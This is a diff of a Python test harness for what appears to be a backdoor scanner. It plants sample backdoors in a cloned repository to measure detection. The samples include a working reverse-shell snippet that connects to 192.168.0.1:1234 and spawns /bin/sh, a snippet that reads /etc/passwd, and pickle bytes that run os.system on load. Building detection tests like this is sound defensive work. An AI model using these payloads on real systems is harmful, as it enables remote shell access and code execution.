| backdoor3 = """ | backdoor3 = """import socket,subprocess,os | ||||||
| import socket,subprocess,os |  | ||||||
| s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) | ||||||
| s.connect(("192.168.0.1",1234)) | s.connect(("192.168.0.1",1234)) | ||||||
| os.dup2(s.fileno(),0) | os.dup2(s.fileno(),0) | ||||||
| os.dup2(s.fileno(),1) | os.dup2(s.fileno(),1) | ||||||
| os.dup2(s.fileno(),2) | os.dup2(s.fileno(),2) | ||||||
| subprocess.call(["/bin/sh","-i"]) | subprocess.call(["/bin/sh","-i"])""" | ||||||
| """ |  | ||||||
|  |  | ||||||
| # 示例4: 通过 eval 执行任意代码 | # 示例4: 通过 eval 执行任意代码 | ||||||
| backdoor4 = """ | backdoor4 = """code = "print('Hello, World!')" | ||||||
| code = "print('Hello, World!')" | eval(code)""" | ||||||
| eval(code) |  | ||||||
| """ |  | ||||||
|  |  | ||||||
| # 示例5: 通过 exec 执行任意代码 | # 示例5: 通过 exec 执行任意代码 | ||||||
| backdoor5 = """ | backdoor5 = """code = ''' | ||||||
| code = ''' |  | ||||||
| import os | import os | ||||||
| os.system('ls') | os.system('ls') | ||||||
| ''' | ''' | ||||||
| exec(code) | exec(code)""" | ||||||
| """ |  | ||||||
|  |  | ||||||
| # 示例6: 简单的 HTTP 服务器后门 |  | ||||||
| backdoor6 = """ |  | ||||||
| import http.server |  | ||||||
| import socketserver |  | ||||||
|  |  | ||||||
| PORT = 8000 |  | ||||||
|  |  | ||||||
| Handler = http.server.SimpleHTTPRequestHandler |  | ||||||
|  |  | ||||||
| with socketserver.TCPServer(("", PORT), Handler) as httpd: |  | ||||||
|     print("serving at port", PORT) |  | ||||||
|     httpd.serve_forever() |  | ||||||
| """ |  | ||||||
|  |  | ||||||
| # 示例7: 读取并显示文件内容 | # 示例7: 读取并显示文件内容 | ||||||
| backdoor7 = """ | backdoor7 = """with open('/etc/passwd', 'r') as file: | ||||||
| with open('/etc/passwd', 'r') as file: |  | ||||||
|     data = file.read() |     data = file.read() | ||||||
|     print(data) |     print(data)""" | ||||||
| """ |  | ||||||
|  |  | ||||||
| # 示例8: 无限循环 |  | ||||||
| backdoor8 = """ |  | ||||||
| while True: |  | ||||||
|     print("This is a backdoor.") |  | ||||||
| """ |  | ||||||
|  |  | ||||||
| backdoors = [ | backdoors = [ | ||||||
|     backdoor1, |     backdoor1, | ||||||
| @@ -133,12 +103,15 @@ backdoors = [ | |||||||
|     backdoor3, |     backdoor3, | ||||||
|     backdoor4, |     backdoor4, | ||||||
|     backdoor5, |     backdoor5, | ||||||
|     backdoor6, |  | ||||||
|     backdoor7, |     backdoor7, | ||||||
|     backdoor8, |  | ||||||
| ] | ] | ||||||
|  |  | ||||||
|  | backdoors_pickle = [ | ||||||
|  |     b'\x80\x03c__main__\nPerson\nq\x00)\x81q\x01}q\x02(X\x03\x00\x00\x00ageq\x03K\x12X\x04\x00\x00\x00nameq\x04X\x06\x00\x00\x00Pickleq\x05ub.', | ||||||
|  |     b'\x80\x03c__main__\nUser\nq\x00)\x81q\x01}q\x02(X\x05\x00\x00\x00adminq\x03\x88X\x05\x00\x00\x00guestq\x04\x89ub.', | ||||||
|  |     b'cnt\nsystem\np0\n(Vcalc\np1\ntp2\nRp3\n.', | ||||||
|  |     b'\x80\x03c__main__\nUser\nq\x00)\x81q\x01}q\x02(X\x05\x00\x00\x00adminq\x03\x88X\x05\x00\x00\x00guestq\x04\x89ubcnt\nsystem\np0\n(Vcalc\np1\ntp2\nRp3\n.' | ||||||
|  | ] | ||||||
| def inject_pickle_backdoor(root_path: str) -> None: | def inject_pickle_backdoor(root_path: str) -> None: | ||||||
|     """ |     """ | ||||||
|     Generate a pickle backdoor and insert it into the specified path. |     Generate a pickle backdoor and insert it into the specified path. | ||||||
| @@ -149,8 +122,8 @@ def inject_pickle_backdoor(root_path: str) -> None: | |||||||
|     all_path = [str(p) for p in Path(root_path).glob("*") if p.is_dir()] |     all_path = [str(p) for p in Path(root_path).glob("*") if p.is_dir()] | ||||||
|     paths = random.sample(all_path, random.randrange(1, len(all_path))) |     paths = random.sample(all_path, random.randrange(1, len(all_path))) | ||||||
|     for path in paths: |     for path in paths: | ||||||
|         backdoor_id = random.randrange(0, len(backdoors)) |         backdoor_id = random.randrange(0, len(backdoors_pickle)) | ||||||
|         backdoor = backdoors[backdoor_id] |         backdoor = backdoors_pickle[backdoor_id] | ||||||
|         filename = os.path.join(path, f"backdoor{backdoor_id}.pickle") |         filename = os.path.join(path, f"backdoor{backdoor_id}.pickle") | ||||||
|         with open(filename, "wb") as f: |         with open(filename, "wb") as f: | ||||||
|             pickle.dump(backdoor, f) |             pickle.dump(backdoor, f) | ||||||
|   | |||||||
| @@ -47,6 +47,10 @@ class TestFinalTests(unittest.TestCase): | |||||||
|             clone_repo("https://github.com/TheAlgorithms/Python.git", "/tmp/Python") |             clone_repo("https://github.com/TheAlgorithms/Python.git", "/tmp/Python") | ||||||
|         shutil.copytree("/tmp/Python", self.path) |         shutil.copytree("/tmp/Python", self.path) | ||||||
|         sampleRate = 0.1 |         sampleRate = 0.1 | ||||||
|  |  | ||||||
|  |         # TODO | ||||||
|  |         # preproccessing | ||||||
|  |  | ||||||
|         self.inject_result = inject_random_backdoor(self.path, sample_rate=sampleRate) |         self.inject_result = inject_random_backdoor(self.path, sample_rate=sampleRate) | ||||||
|         self.pickle_true_num = inject_pickle_backdoor(self.path) |         self.pickle_true_num = inject_pickle_backdoor(self.path) | ||||||
|         self.pyc_true_num = inject_pyc_backdoor(self.path) |         self.pyc_true_num = inject_pyc_backdoor(self.path) | ||||||
|   | |||||||
		Reference in New Issue
	
	Block a user